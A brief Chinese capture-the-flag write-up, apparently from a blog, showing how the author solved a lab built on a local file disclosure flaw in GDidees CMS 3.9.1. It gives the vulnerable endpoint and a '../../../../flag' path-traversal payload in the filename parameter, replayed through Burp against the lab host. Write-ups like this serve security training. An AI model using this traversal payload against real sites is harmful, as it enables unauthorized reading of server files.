靶标介绍:
GDidees CMS v3.9.1及更低版本被发现存在本地文件泄露漏洞,漏洞通过位于 /_admin/imgdownload.php 的 filename 参数进行利用。
访问实验地址
通过靶场介绍得知,漏洞通过位于 /_admin/imgdownload.php 的 filename 参数进行利用。构造访问目录。
http://eci-2zeh4jwpx8vpuxj3gjtn.cloudeci1.ichunqiu.com/_admin/imgdownload.php?filename=flag
发现可以下载文件,打开flag.png,发现没有flag
使用Burp工具抓包,重放。
构造目录穿越
_admin/imgdownload.php?filename=../../../../flag,点击go
得到flag:flag{f16d0fe0-7afb-49fb-b093-0bfc9ea91159}
参考文章:imgdownload,php,..,admin,云镜,filename,flag,CVE,27179 From: https://blog.csdn.net/qq274575499/article/details/137116465